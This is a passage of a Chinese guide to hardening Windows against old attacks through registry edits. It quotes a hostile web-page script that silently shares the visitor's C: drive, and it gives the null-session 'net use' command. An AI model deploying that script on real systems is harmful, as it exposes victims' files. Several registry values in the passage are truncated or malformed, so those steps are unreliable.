　　解决办法：挖出IE的本地安全设置选项。打开注册表编辑器，顺次展开到：HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/0，在右边窗口中找到DWORD值“Flags”，默认键值为十六进制的21(十进制33)，双击“Flags”，在弹出的对话框中将它的键值改为“1”即可，关闭注册表编辑器。无需重新启动电脑，重新打开IE，再次点击“工具→Internet选项→安全”标签，你就会看到多了一个“我的电脑”图标（如图2），在这里你可以对IE的本地安全进行配置。修改IE安全设置中有关“我的电脑”的设置，选定后，禁用ActiveX下载就万事大吉了。
　　另外，打了补丁之后，会弹出一个对话框（如图3），并拒绝运行该网页中所含的程序，所以经常给自己的电脑打补丁是必不可少的。
4、IE的ActiveX控件被绕过漏洞防范方法
　　虽然说IE提供对于"下载已签名的ActiveX控件"进行提示的功能，但是恶意攻击代码会绕过IE，在无需提示的情况下下载和执行ActiveX控件程序，而这时恶意攻击者就会取得对系统的控制权限。如果要屏蔽此类黑手，可以打开注册表编辑器，然后展开如下分支：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/，请为Active Setup controls创建一个基于CLSID的新键值{6E9_11CF_AAFA_00AA00 B6015C}，然后在新键值下创建一个REG_DWORD类型的键Compatibility，并设定键值为0x即可。
　　5、浏览网页硬盘被共享漏洞防范方法
　　浏览网页硬盘被共享，也是一个常见的漏洞，受害者都是在浏览了含有有害代码的ActiveX网页文件后中招的。以下是其原代码中的关键部分：
&script language=JavaScript&
document.write("&APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&&/APPLET&");
function f(){
&!--ActiveX初始化过程--&
a1=document.applets[0];
a1.setCLSID("");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Flags",302,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Type",0,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Path","C://");
function init()
setTimeout("f()", 1000);
&!--实现打开页面后1秒钟内执行测试修改注册表的工作--&
注意：以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注册表，在HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Network/LanMan下面添加键值“RWC$” ，在RWC$”下又分别建立键值“Flags”、“Type”“Path”，这样就把C盘设为共享了，共享名为RWC$。而且你在网络属性中还看不到硬盘被共享了！如果把"Flags"=dword:改成"Flags"=dword:就可看到硬盘被共享。
　　解决办法：把系统所在目录下的system子目录下面的Vserver.vxd文件（Microsoft 网络上的文件与打印机共享虚拟设备驱动程序）删掉，再到注册表中，把HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/VxD/下的Vserver键值删掉即可。
6、防止LM散列被破解
　　尽管Windows的大多数用户不需要LAN Manager的支持，微软还是在Windows NT和2000系统里缺省安装了LAN Manager口令散列。由于LAN Manager使用的加密机制比微软现在的方法脆弱，LAN Manager的口令能在很短的时间内被破解。LAN Manager散列的主要脆弱性在于：
　　1.长的口令被截成14个字符
　　2.短的口令被填补空格变成14个字符
　　3.口令中所有的字符被转换成大写
　　4.口令被分割成两个7个字符的片断，像这样：
　　--------------------------------------------------------
　　| 1st 8bytes of LM hash | second 8bytes of LM hash |
　　--------------------------------------------------------
　　from first 7 chars　　　　from second 7 chars
　　事实上，这就意味着口令破解程序只要破解两个7个字符的口令，并且不用测试小写字符情况即可获得成功。另外，LAN Manager容易被侦听口令散列，侦听可以为攻击者提供用户的口令。Win2000引入了有趣的方法，14个字符的限制被增加到127个，但为了向后兼容仍然使用LAN Manger散列算法，这样，对于与NT相同类型的攻击，密码依旧很脆弱。而且，如果您的整个操作系统环境中有不支持密码长度超过14个字符的非Win2000客户端，您可能会被这种限制搞糊涂。
　　有两种方法可以用来防止LM散列的密码被破解。第一种方法是取消LAN Manger在整个网络的鉴定功能，使用NTLMv2。NTLMv2(NT LanManager version 2)的认证方法克服了LAN Manger的大部分脆弱性，使用了更强健的编码，并改进了认证的安全机制。
　　从Windows NT 4.0 SP4及以后的系统，包括Windows 2000，微软使得我们在网络上只使用NTLMv2成为可能。在Windows NT和2000中这个功能在注册表中的控制键是HKLM/System/CurrentControlSet/Control/LSA/LMCompatibilityLevel。如果你把它的值设置成3，工作站或服务器将只使用NTLMv2信任证书进行认证。如果设置成5，任何域控制器将拒绝LM和NTLM的认证而只接受NTLMv2。
　　如果在你的网络里还有象Windows 95那么“老”的操作系统，必须得小心些，因为那些旧的系统无法在微软网络客户端使用NTLMv2。在Win9x中，该键值是
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/LSA/LMCompatibility，它只接受0到3的值（目录服务客户端）。最安全的做法是除去旧的系统，因为它妨碍你为你的组织提供所需的最低安全标准。
　　简单的删除网络LanMan散列带来的问题是，在SAM或Active Directory中散列还会产生和存储。微软提供了一次性取消LanMan散列防止再生的方法。在Windows 2000上，找到下面注册键：HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa，在注册表编辑器RegEdit的菜单中选择Edit，单击Add键，加入一个名为NoLMHash的键值。然后，退出注册表编辑器，重启计算机。下次用户改变口令时，计算机就不会再产生LanMan散列。如果这个键是在Windows
2000域控制器上产生的，LanMan散列就不会被生成并存储在Active Directory。
　　在Windows XP中同样的功能可以通过设置键值来完成。在注册表HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Lsa下建立一个名为“NoLMHash”的DWORD值，并将其键值改为1即可（图4），这和Windows 2000中生成NoLMHash键的效果是一样。
7、防范共享入侵
　　大家知道，如果系统的139端口开放，则计算机就会泄露你的机器的一些信息，其中第一行中的NB便是这台计算机的机器名，WORKGROUP则说明这台机器是工作组模式。最后一行还列出了机器的MAC地址（网卡地址）。
　　事实上，对于Windows9x来说，共享入侵的实现离不开139端口的开放，而对于Windows 2000来说，在查看共享资源的时候，系统会先尝试连接139端口。如果139端口关闭的话，就会尝试445端口的连接（在黑客进行IPC$入侵时同样离不开它们），所以防范共享入侵不仅要关闭139端口，还要关闭445端口。把它们都关闭就可以防范别人通过共享来入侵你的电脑，同时也可以防止别人通过IPC$入侵，因为IPC$入侵也离不开139和445端口的支持。
　　关闭139端口非常简单，通过防火墙来屏蔽NetBIOS对应的139端口，这样别人就无法攻击我们了。而关闭445端口，则可以通过修改注册表来实现，方法是：在“开始”菜单的“运行”中输入regedit，打开注册表编辑器。然后展开到这里：
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/NetBT/Parameters，在它的下面新建一个DWORD值SMBDeviceEnabled，其键值为1即可，如图所示（如图5）。
　　8、禁止空连接
　　空连接是在没有信任的情况下与服务器建立的会话，换句话说，它是一个到服务器的匿名访问。使用命令net use
//IP/ipc$ "" /user:"" 就可以简单地和目标建立一个空连接（需要目标开放IPC$）。留着不放心，还是禁止掉的好！这一步可以通过批处理来进行，方法是用记事本新建一个文本文件，输入如下内容：
@echo REGEDIT4&&del.reg
@echo.&&del.reg
@echo [HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/LSA]&&del.reg
@echo "RestrictAnonymous"=dword:&&del.reg
@REGEDIT /S /C del.reg
　　另存为以.bat为扩展名的批处理文件，点击这个文件就可以禁止空连接。当然，我们也可以手动来禁止空连接，到注册表HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/LSA下，将DWORD值RestrictAnonymous的键值改为1即可，效果是一样的。需要指出的是空连接和IPC$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话，换句话说，它是一个到服务器的匿名访问。IPC$是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限。使用命令net
use //IP/ipc$ "" /user:""就可以简单地和目标建立一个空连接（需要目标开放IPC$）。
　　9、防范脚本病毒攻击
　　脚本病毒是常见的病毒之一，它们的传播速度非常快，主要是通过邮件来传播，由于编写简单，修改容易，所以只要有一个脚本病毒出现，立刻就会出现众多变种，非常令人头疼。其实通过修改注册表也可以简单的防范脚本病毒。下面说说防范方法。
　　由于脚本病毒的执行离不开WSH（Windows Script Host），它的代码是通过WSH来解释执行的。所以只要卸载WSH自然可以防范脚本病毒。但是WSH的功能实在是太强大了！所以，如果你不忍心删除它或还需要WSH，可以使用下面这个修改注册表的方法，之后就可以鱼和熊掌兼得了！
　　其实，为了避免Windows对脚本不加限制的滥用，微软为Windows脚本宿主5.6采用了一种新的安全模型。使得脚本用户在运行脚本之前验证其真实性。脚本开发人员对其脚本进行签名，以免发生未经授权的修改。管理员可以强制实施严格的策略，确定哪些用户有权在本地或远程运行脚本。在Windows 2000中，签名验证策略是通过“本地安全策略”编辑器设置的。签名验证策略注册表项位于以下配置单元：HKEY_CURRENT_USER/SOFTWARE/Microsoft/Windows ScriptHost/Settings/TrustPolicy，该注册表项设置为以下某个REG_DWORD值：如果为0则运行所有的脚本，如果认为脚本不可信，则提示用户，此时键值可设为1，如果键值为2则只运行可信脚本。建议将该DWORD值设为1。
10、防范其他攻击
　　修改注册表还可以防范许多攻击，比方说我们可以：
　　(1)关闭Windows默认共享
　　用过Windows 2000的朋友一定知道，默认的情况下，硬盘中所有逻辑分区都是被设置成共享的，所以有必要关闭这类不用的共享。首先先把已有的IPC$和默认共享都删除删除（默认共享是为了方便远程管理而开放的共享，包含了所有的逻辑盘c$,d$,e$……和系统目录Winnt或WindowsADMIN$），输入：
　　net share ipc$ /del
　　net share admin$ /del
　　net share c$ /del
　　net share c$ /del
　　…………
　　然后，用记事本编辑如下内容的注册表文件，保存为任意名字的.Reg文件即可：
　　Windows Registry Editor Version 5.00
　　[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/lanmanserver/parameters]
　　"AutoShareServer"=dword:
　　"AutoSharewks"=dword:
　　注意，在最后面一定要空上一行才行！
　　(2)防范WinNuke黑客程序的攻击
　　WinNuke是一个破坏力极强的黑客程序，该程序能对计算机中的Windows系统进行破坏，从而会导致整个计算机系统瘫痪，我们可以修改注册表来防范它。展开注册表到HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/VxD/MSTCP，在对应MSTCP键值的右边窗口中新建一个DWORD值，将它命名为“BSDUrgent”，然后将BSDUrgent的键值设为0，如何重新启动计算机后就可以了。
??(2)防止ICMP重定向报文的攻击
　　ICMP是Internet Control Message Protocol的缩写，意即网际控制报文协议，ICMP用来发送关于IP数据报传输的控制和错误信息的TCP/IP协议。ICMP攻击主要是指向装有Windwos操作系统的机器发送数量较大且类型随机变化的ICMP包，遭受攻击的计算机会出现系统崩溃的情况，不能正常运作。修改注册表可以防范重定向报文的攻击，方法是打开注册表，展开到：
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters，将DWORD值EnableICMPRedirects的键值改为0即可（如图6）。该参数控制Windows 2000是否会改变其路由表以响应网络设备发送给它的ICMP重定向消息，Win2000中默认值为1，表示响应ICMP重定向报文。
??(3)防止IGMP攻击
　　IGMP是Internet Group Management Protocol的缩写，意即Internet群组管理协议，这种TCP/IP协议允许Internet主机参加多点播送——一种向计算机群广播信息的有效手段。IGMP攻击是指向装有Windows操作系统的机器发送长度和数量都较大的IGMP数据包，使得遭受攻击的主机蓝屏下线（Win2000虽然没这个bug了，但IGMP并不是必要的）。我们可以修改注册表，使得系统停止对IGMP协议的响应，以此来防范这种攻击。方法是打开注册表，展开到：HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters，将DWORD值IGMPLevel的键值改为0即可(默认值为2)。
??(4)防止SYN洪水攻击
　　SYN攻击保护包括减少SYN-ACK重新传输次数，以减少分配资源所保留的时间和路由缓存项资源分配延迟，直到建立连接为止。修改注册表防范SYN洪水攻击的方法是打开注册表，展开到：HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters，将DWORD值SynAttackProtect的键值改为2即可(默认值为0)。如果synattackprotect=2，则AFD的连接指示一直延迟到三路握手完成为止。注意，仅在TcpMaxHalfOpen和TcpMaxHalfOpenRetried设置超出范围时，保护机制才会采取措施。
安全上网心得
上网时间长了，难免碰到一些图谋不轨的家伙对自己发动攻击，开始的时候也没有什么好办法，只能天天祈求上天不要让自己撞到灾星，然而这种“迷信活动”并不能确保上网 的安全性，经过了长时间的积累，我发现知要提高警惕、认识网络黑客的攻击手段，还是可以有效的防治他们的进攻的。经过总结，我将一些比较重要却容易被人们忽视的问题汇编如下，希望给各位网虫一定的帮助：
　　一、警惕未知的网页，若可能先获取源代码：
　　有的时候通过QQ、电子邮件或者网页广告常会收到一些邀请信件，告诉你有一个非常有意思的地址，这个时候有些人的好奇心就来了，不假思索的通过浏览器去访问那些地址。谁成想打开一看傻了眼，原来那个地址是黑客制作的，其中包含了破坏性代码，想尽快关闭窗口已经来不及了，只听到自己的爱机硬盘一阵狂响——硬盘已经被格式化了……
　　这并非危言耸听，利用HTML代码格式化硬盘早在多年前就已经出现了，时至今日仍然有很多人被其所害，主要原因在于系统中没有安装防火墙或者防护软件。这也不能怪大家不够警惕，只能说是“防不胜防”。如何办才好呢？最好的办法就是不去访问这些未知页面，如果你的好奇心非常强烈，那么我建议你先通过特殊的方法获得页面源代码观看。
　　获得页面的源代码有很多办法，网上有一些软件——例如GetHttp——可以方便的将远程页面下载回来，使用文本编辑软件对其中的代码进行阅读，如果存在Java代码那么就应该自己分析，看看其中是否有对系统造成威胁的代码了。这种方法似乎比较麻烦，也不是和广大的初学者，但是为了安全，还是应该了解这方面的知识为宜。
　　注：上述方法可能比较麻烦，但是在QQ中可能会有一些人突然给你发送过来一个地址，对于这种情况我没有其他什么好办法，只能是先阅读源代码、再进行访问